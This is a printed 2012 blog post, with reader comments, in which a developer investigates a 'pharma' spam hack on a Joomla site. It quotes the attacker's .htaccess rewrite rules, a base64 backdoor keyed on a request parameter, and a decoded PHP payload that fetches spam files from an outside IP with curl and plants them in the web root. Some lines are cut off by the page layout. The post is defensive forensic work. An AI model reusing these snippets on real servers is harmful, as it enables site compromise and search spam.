You are on page 1of 6

Joomla ‘Pharma’ Hack « Peter Tasker

http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/

Blog at WordPress.com. | The Widely Theme.

Internet Thoughts

July 23, 2012

One of the more CSI type things I get to do in my job is figure out how servers a uring out why a site was listing Pharmaceuticals in Google results. I’ve dealt alot with hacked and compromised servers, but have never come acro Basically, 3 modified files kept appearing on the server, a modified .htaccess file What we discovered was the following in the .htaccess file: 1 2 3 4 5 6 7 8 9 10 11 # Apache search queries statistic module <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|aol|bing|craw RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search| RewriteCond %{REQUEST_URI} /$ [OR] RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|p RewriteCond %{REQUEST_FILENAME} !common.php RewriteCond %{DOCUMENT_ROOT}/common.php ‐f RewriteRule ^.*$ /common.php [L] </IfModule>

8

What this means is that any search bot will get redirected through common.php. that modified page meta descriptions and titles. This is outlined pretty well here: macy-hack.html. However, we deleted these files and modified the .htaccess file back to it’s origin big question was how? I did a search through the Joomla source for base64_encode/decode and found or core, but I did find a few that looked a little odd. For example: 1 /**GnPvQdChUa*/if((md5($_REQUEST["img_id"]) == "ae6d32585e

Basically what this does is run whatever is passed in the $_REQUEST["mod_co any base64_encoded string will be run as is. At 6:22 on a sunny Saturday morning, I got a notification from one of my monito

1 de 6

08/09/2013 8:21

 }if ( is_file( "/home/user/public_html/index. CURLOPT_USERAGENT. CURLOPT_HEADER.ico" ) )   $index = "/home/user/public_html/favicon.51/doo  curl_setopt( $ch. This little script is what recreates all the spammy files. "Mozilla/4. $htaccess ).  fputs( $fp.190.  $ch = curl_init().htaccess" ).20.htaccess". ‐4  $chmod = trim( $chmod ).htaccess".190. $chmod ).  }if ( is_file( "/home/user/public_html/favicon. CURLOPT_URL.  touch( "/home/user/public_html/common.  $door = curl_exec( $ch ).php".  $fp = fopen( "/home/user/public_html/common. "Mozilla/4. "w" ). 1 ).20. here is what the request was: /components/com_users/users.  curl_setopt( $ch.php" ) ) {  $index = "/home/user/public_html/common.0 (compa  curl_setopt( $ch.  $inc_ht = curl_exec( $ch ).  $chmod = substr( sprintf( "%o".  curl_setopt( $ch.  }if ( is_file( "/home/user/public_html/index. 8 ).  curl_setopt( $ch. "http://209. CURLOPT_RETURNTRANSFER. 1 ).php?img_id=1f3870be274f6c That param decodes to a lovely PHP script: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 if ( extension_loaded( "curl" ) ) {  $ch = curl_init().wordpress. CURLOPT_HEADER.  curl_setopt( $ch.  }if ( is_file( "/home/user/public_html/.com/2012/07/23/joomla-pharma-hack/ back! I checked the logs and sure enough.Joomla ‘Pharma’ Hack « Peter Tasker http://petetasker.  }$time = filemtime( $index ). CURLOPT_USERAGENT.51/door.t  $inc_code = @file_get_contents( "http://209.190.  $fp = fopen( "/home/user/public_html/. "http://209. CURLOPT_RETURNTRANSFER.20.html".  curl_setopt( $ch.php". CURLOPT_URL. $time ). "http://209.php" ) ) {  $index = "/home/user/public_html/index.htaccess" ) ) {  $index = "/home/user/public_html/. "w" ).20. 0 ).  @chmod( "/home/user/public_html/.htm" ) ) {  $index = "/home/user/public_html/index.php" ).html" ) ) {  $index = "/home/user/public_html/index.  fclose( $fp ).ico". CURLOPT_RETURNTRANSFER.0 (compa  curl_setopt( $ch.0 (compa  curl_setopt( $ch.php".20.  $htaccess = str_replace( "#####INCLUDE#####".php".190.  $ch = curl_init().  curl_setopt( $ch.htaccess". 2 de 6 08/09/2013 8:21 . "Mozilla/4. 0 ). CURLOPT_HEADER.51/incl  }if ( is_file( "/home/user/public_html/index.  @chmod( "/home/user/public_html/common. CURLOPT_URL.  @unlink( "/home/user/public_html/common.  fclose( $fp ).51/inc  curl_setopt( $ch.190. $inc_ht. $time ). 1 ). $chmod ). fileperms( $index ) ).  } else {  $door = @file_get_contents( "http://209.51/inc  curl_setopt( $ch.php". 0 ).20.190.  }if ( is_file( "/home/user/public_html/common. $  @unlink( "/home/user/public_html/.  touch( "/home/user/public_html/.htm". CURLOPT_USERAGENT. $door ).  fputs( $fp.htaccess".  $inc_code = curl_exec( $ch ).51/in  $inc_ht = @file_get_contents( "http://209.  $chmod = intval( $chmod.

search for a mod_joomla. 3 de 6 08/09/2013 8:21 .Joomla ‘Pharma’ Hack « Peter Tasker http://petetasker. ← WordPress pagination on custom posts Fac 8 COMMENTS Luc | July 25. 2012 at 1:50 pm Change all your FTP.php in my case.com/2012/07/23/joomla-pharma-hack/ So there it is. Witch is the first file created and what is the best way to prevent this attack? Reply petetasker | July 25.. Bookmark the permalink. 2012 at 12:32 pm Hi I have the same on my site. Joomla.wordpress. This entry was posted in Code. a URL param that run’s CURL requests to setup spam files on a s Wanted to record this so that anyone else having this issue has somewhere to lo TTFN. About these ads Share this: Like this: Be the first to like this. Joomla passwords and I would disable Jumi or Sourcerer Best way to prevent it is to keep Joomla patched and up to date and don’t instal of..

joomla. Instead of coockies.php containing a remote access terminal.php. 2012 at 5:51 pm Found out that if you rename your admin folder to something other (hasn’t shown up after the usual couple of hours at least…). Reply petetasker | November 28. Reply sam | November 19.com/2012/07/23/joomla-pharma-hack/ Check out the vulnerable extensions list (http://docs. After sifting through server logs.Joomla ‘Pharma’ Hack « Peter Tasker http://petetasker. because even after rem file came back. 2012 at 7:39 pm Looks like this has hit WordPress now. Maybe FlyingPizzas | November 8. it was a good start. Thanks for your post as it helped us to identify the pro Reply Stacy Holmstedt | November 24. search the source code for any base64_encode() or eval() statements. too. 2012 at 3:54 pm Ya the site that was originally infected was moved to another webhost and thing I’m thinking it has something to do with log files as well.logs in my root and wonder if that elsewhere). 2013 at 12:31 am I found a file located at /en/rss.txt there’s a folder called “coo new files. I noticed a few hacked files in my wp-themes folde stall-list-table.php. I also noticed an empty folder called .org/Vulnerable_Exte cure upload form that was included in a page using Jumi. Reply Erik Stenman | February 7. 2012 at 11:21 am Found the same hack on a Drupal site.wordpress. Also. 4 de 6 08/09/2013 8:21 . Hacked files start with <?php and some md running wp-cron.php and wp-admin/load-styles. Thanks for the post.

#HRCBigDay http://t. 2013 at 8:08 pm I had this same probelm recently and got rid of the three files you mention at the beginning of later it is back.Joomla ‘Pharma’ Hack « Peter Tasker http://petetasker. These files no longer exist but the problem is back.co/kAPzyDnNVp 1 week ago HVAC recommendations in Ottawa? Need a new a/c and furnace. Any idea what to look for? I am not nearly as techie with the scripts and looking at logs so some good old fashioned han Many thanks.com/2012/07/23/joomla-pharma-hack/ Reply aquaholic | February 7. 1 month ago I don't know how I have not been using curl to test form submissions for this long.wordpress. Houston Reply LEAVE A REPLY ABOUT PETER TWEETS Serious game of flip cup. 1 month ago 5 de 6 08/09/2013 8:21 .

Joomla ‘Pharma’ Hack « Peter Tasker http://petetasker.com/2012/07/23/joomla-pharma-hack/ I've just taken the WordPress 2013 User and Developer Survey. have you? wp-survey.polldaddy.com/s/wp July the 4th be with you…huh? 2 months ago Follow @petetasker RECENT POSTS 2012 in review Facebook JS SDK API – Post Image to Feed Facebook Set Auto Grow – A version that actually works Joomla ‘Pharma’ Hack WordPress pagination on custom posts CATEGORIES Code Facebook General Joomla WordPress WordPress VIP 6 de 6 08/09/2013 8:21 .wordpress.